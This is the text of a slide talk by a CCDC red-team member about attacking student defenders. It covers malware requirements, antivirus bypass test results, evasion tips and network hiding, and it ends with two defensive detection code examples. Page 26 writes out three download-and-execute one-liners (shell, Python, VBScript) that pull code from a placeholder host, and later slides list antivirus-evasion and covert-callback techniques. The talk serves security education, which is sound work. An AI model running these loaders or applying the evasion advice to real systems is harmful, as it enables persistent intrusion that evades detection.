Page 1: Red teaming the CCDC

Red Teaming the CCDC

hacking the most paranoid student system administrators in the nation

Matt “scriptjunkie” Weeks

Page 2: Red teaming the CCDC

Some funny things

Our mistakes and yours

Page 3: Red teaming the CCDC

No, don’t start “aCcbsXoAIfRsU”

Page 4: Red teaming the CCDC

Those other people logged in are not your friends.

Page 5: Red teaming the CCDC

You planned to get hacked?

Page 7: Red teaming the CCDC
Page 8: Red teaming the CCDC
Page 9: Red teaming the CCDC
Page 10: Red teaming the CCDC
Page 11: Red teaming the CCDC
Page 12: Red teaming the CCDC
Page 13: Red teaming the CCDC
Page 14: Red teaming the CCDC

A year of curating red team wallpaper

Page 15: Red teaming the CCDC
Page 16: Red teaming the CCDC

Gotta keep up with changing memes

Page 17: Red teaming the CCDC

The red team has you

Page 18: Red teaming the CCDC
Page 19: Red teaming the CCDC

Screenshot inception!

Page 20: Red teaming the CCDC
Page 21: Red teaming the CCDC

Personal Favorite

https://www.youtube.com/watch?v=TrnUO6TLrtE

Page 22: Red teaming the CCDC

The malware games

Challenges writing malware

Page 23: Red teaming the CCDC

Requirements

Full-featured RAT
  File access
  Interactive shell
  Screenshots, keylogger
  May include stealth features

Basic backdoors
  Used for re-establishing full-featured RAT
  Simple command and/or shellcode execution
  Callback or listening

Keylogger/persistent monitoring

File packing tools

Worms – every method possible

Page 24: Red teaming the CCDC

Compatibility is hard

Windows XP – Win 8.1
  Hook-based keylogging fails…

*NIXes make Windows look great
  No two Linux distros start up the same
  OS X(!), NetBSD, OpenBSD, FreeBSD, x64/x86, OpenIndiana (Solaris), Ubuntu, Fedora, Linux Mint

Page 25: Red teaming the CCDC

But hard work pays off, kids

Page 26: Red teaming the CCDC

On-the-fly backdoors

Usually you are caught off-guard with at least one system

Webshell collections are your friend

Scripting skills are a must

while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done

import urllib2; eval(urllib2.urlopen('http://a.bc/def').read())

echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs

Page 27: Red teaming the CCDC

First world red team problems:

I accidentally six or seven keylogger copies

Page 28: Red teaming the CCDC

On Antivirus

-or-

why does everybody use MBAM?

Page 29: Red teaming the CCDC

Process

Write malware → Does AV detect?
  Yes → Look for shady code; obfuscate functions, strings
  No → Done!

Page 30: Red teaming the CCDC

But usually

Write malware → Does AV detect? → No → Done!

Page 31: Red teaming the CCDC

AV test lab

Top market share AVs (Internet Security Suite version) on default settings

7 “fresh” tests (results BEFORE I knew what any of the AVs would detect)

Page 32: Red teaming the CCDC

Why not VirusTotal?

Page 33: Red teaming the CCDC

Test 1: Widely known malware with 1 byte appended

The only way to fail is by using giant hash lists instead of real signatures

[Per-vendor result grid; vendor logos not recoverable: 6 WIN, 6 FAIL]
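To make the Test 1 point concrete from the detection side, here is an added example (not code from the talk) contrasting a file-hash blocklist with a byte-pattern signature on a constructed, harmless sample; the sample bytes, blocklist entry and regex are all made up for this illustration.

```python
import hashlib
import re

# Constructed stand-in for a "widely known" sample: a harmless byte string,
# not real malware. Its SHA-256 plays the role of one blocklist entry.
KNOWN_SAMPLE = b"MZ\x90\x00" + b"this-is-a-constructed-test-sample" + b"\x00" * 16

# Detection style 1: a hash blocklist (the "giant hash lists" of the slide).
HASH_BLOCKLIST = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}

# Detection style 2: a content signature over bytes the sample actually
# contains, anchored at the header. Constructed for this example.
CONTENT_SIGNATURE = re.compile(rb"^MZ.{2}this-is-a-constructed-test-sample", re.DOTALL)


def hash_detects(data: bytes) -> bool:
    """True only if the exact file hash is on the blocklist."""
    return hashlib.sha256(data).hexdigest() in HASH_BLOCKLIST


def signature_detects(data: bytes) -> bool:
    """True if the byte pattern is present, whatever trails after it."""
    return CONTENT_SIGNATURE.search(data) is not None


def run_test_1(sample: bytes) -> dict:
    """Replay the slide's Test 1: the known sample, then the same bytes with a
    single byte appended. Returns each detector's verdict on both variants."""
    modified = sample + b"\x00"
    return {
        "hash": {"original": hash_detects(sample), "appended": hash_detects(modified)},
        "signature": {"original": signature_detects(sample), "appended": signature_detects(modified)},
    }


if __name__ == "__main__":
    for name, verdicts in run_test_1(KNOWN_SAMPLE).items():
        print(f"{name:9s} original={verdicts['original']} appended={verdicts['appended']}")
```

The hash detector loses the sample the moment its length changes, while the content signature still fires; that is the difference between a hash list and a real signature the slide is pointing at.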

Page 34: Red teaming the CCDC

Test 2: Malware with public code samples

[Per-vendor result grid; vendor logos not recoverable: 12 FAIL]

Page 35: Red teaming the CCDC

Test 3: One-off malware with no evasions

[Per-vendor result grid; vendor logos not recoverable: 7 FAIL, 3 WIN, 2 INDECISIVE]

Page 36: Red teaming the CCDC

Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse

[Per-vendor result grid; vendor logos not recoverable: 12 FAIL]

Page 37: Red teaming the CCDC

Test 5: “The Kraken” – Sneaky firewall-evading malware

[Per-vendor result grid; vendor logos not recoverable: 11 FAIL, 1 WIN]

Page 38: Red teaming the CCDC

Test 6: Worm with no evasions

[Per-vendor result grid; vendor logos not recoverable: 9 FAIL, 2 WIN, 1 hosed VM]

Page 39: Red teaming the CCDC

Test 7: Legit program used maliciously

[Per-vendor result grid; vendor logos not recoverable: 11 FAIL, 1 INDECISIVE]

Page 40: Red teaming the CCDC

Notes

Symantec was the only AV to detect reverse meterpreter on the wire

Kaspersky’s behavioral emulation detected one worm well

Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist) but not necessarily bad

Trend Micro was the only AV to block hash dumping

Panda and Avast gave errors installing and were not tested

Page 41: Red teaming the CCDC

Final standings

[Per-vendor standings grid; vendor logos not recoverable. Labels as extracted: 100% FAIL, meh, 100% FAIL, TIED 1st, 100% FAIL, 100% FAIL, FAIL, FAIL, meh, TIED 1st, 3rd, meh]

Page 42: Red teaming the CCDC

Just kidding. After 2 hours obfuscating, these are the real final standings:

[Per-vendor result grid; vendor logos not recoverable: 12 FAIL]

Page 43: Red teaming the CCDC

How do I bypass AV?

Write your own stuff

Dynamically resolve API calls

Obfuscate strings

Introduce environmental/system dependencies to generically thwart sandboxing

Write your own stuff

Impersonate legitimate software

Watch what hits disk

Digitally sign your stuff if you can

Write your own stuff

Page 44: Red teaming the CCDC

Security Software Lessons

Some AVs are a total fail

MalwareBytes Pro is in this list with MS, McAfee, F-Secure

Many have one really cool feature or heuristic

Kaspersky, Symantec, Trend Micro

All can be bypassed easily for most malware

Only detection remaining after 2 hours was one worm vs Kaspersky

Page 45: Red teaming the CCDC

Hiding from the students

Page 46: Red teaming the CCDC

Hiding from the students

Host hiding

Hide while running

Hide start

Meterpreter is great for functionality, bad for persistence

Mostly custom malware

Mostly standard persistence methods

Don’t run in your own process

Don’t use any of those toy languages with dependencies

Use C!

Page 47: Red teaming the CCDC

Don’t hide stuff rootkit finders look for

Page 48: Red teaming the CCDC

Don’t sweat the one-offs

Page 49: Red teaming the CCDC

Hiding on the wires

Hiding from Wireshark

Harder than hiding on host

Try to blend in with normal traffic

Throw Wireshark crashers

Remove packets from view

Hiding from netstat/tcpview

Using HTTP(S) instead of TCP callbacks doesn’t leave a connection open

If that fails, blend in by using common ports and cloud IPs

Migrate session to web browser or critical process

Page 50: Red teaming the CCDC

Hiding on the wires

Use every protocol that gets out

TCP

UDP

HTTPS

DNS

Use hop points in cloud/web hosting

Use file sharing/paste/social media sites

Random callback selection and delays to avoid monitors

Any way students can send or receive info, you can too
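From the monitoring side, the randomized-delay callbacks described on this slide still leave a statistical trace: the gaps between connections to one destination cluster around the sleep interval. The following is an added example, not from the talk, that flags such regular outbound connections in a constructed connection log; the log lines, addresses and thresholds are made up for the illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound connection log (proxy/firewall style): "timestamp src dst:port".
# 10.0.0.5 browses several sites at irregular times; 10.0.0.9 calls back to one
# cloud-looking address on 443 about every 60 s with a few seconds of random delay.
LOG = """\
2014-03-01T10:00:00 10.0.0.5 203.0.113.10:443
2014-03-01T10:00:07 10.0.0.5 203.0.113.22:80
2014-03-01T10:00:11 10.0.0.9 198.51.100.7:443
2014-03-01T10:00:59 10.0.0.5 203.0.113.10:443
2014-03-01T10:01:18 10.0.0.9 198.51.100.7:443
2014-03-01T10:02:14 10.0.0.9 198.51.100.7:443
2014-03-01T10:02:40 10.0.0.5 203.0.113.31:443
2014-03-01T10:03:20 10.0.0.9 198.51.100.7:443
2014-03-01T10:04:25 10.0.0.9 198.51.100.7:443
2014-03-01T10:05:19 10.0.0.9 198.51.100.7:443
2014-03-01T10:06:00 10.0.0.5 203.0.113.10:443
"""


def parse(log: str):
    """Yield (timestamp, src, dst) tuples from the constructed log format."""
    for line in log.splitlines():
        ts, src, dst = line.split()
        yield datetime.fromisoformat(ts), src, dst


def find_beacons(log: str, min_conns: int = 5, max_cv: float = 0.5) -> dict:
    """Flag (src, dst) pairs whose inter-connection gaps are regular enough to
    look like a scheduled callback. max_cv bounds the coefficient of variation
    (stddev / mean) of the gaps, so modest random delay is still caught while
    genuinely bursty browsing is not. Returns {pair: stats} for flagged pairs."""
    times = defaultdict(list)
    for ts, src, dst in parse(log):
        times[(src, dst)].append(ts)
    flagged = {}
    for pair, stamps in times.items():
        if len(stamps) < min_conns:
            continue  # too few connections to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if mean(gaps) == 0:
            continue  # identical timestamps (log burst), not a beacon pattern
        cv = pstdev(gaps) / mean(gaps)
        if cv <= max_cv:
            flagged[pair] = {"count": len(stamps), "mean_gap": mean(gaps), "cv": round(cv, 3)}
    return flagged
```

On the constructed log only the 10.0.0.9 pair is flagged (six connections, mean gap about 62 s, coefficient of variation under 0.1); tuning min_conns and max_cv against real traffic is what separates this from noise in practice.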

Page 51: Red teaming the CCDC

Dealing with firewalls

Two types

Host

Network

Host firewalls

Usually don’t stop outbound traffic

Can go underneath, watch raw packets

Frequently add exceptions or drop the firewall

Page 52: Red teaming the CCDC

Network firewalls

Great to own

Tough if you don’t

Use service ports, since they must be able to reach the hosts

Page 53: Red teaming the CCDC

Defenses that hurt

Patch or block RCE’s

Strict inbound and outbound network firewall rules

Traffic monitoring

Different passwords on all the boxes

Pull the plug

Reverting (sometimes)

Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you

Page 54: Red teaming the CCDC

Questions

@scriptjunkie1

https://scriptjunkie.us/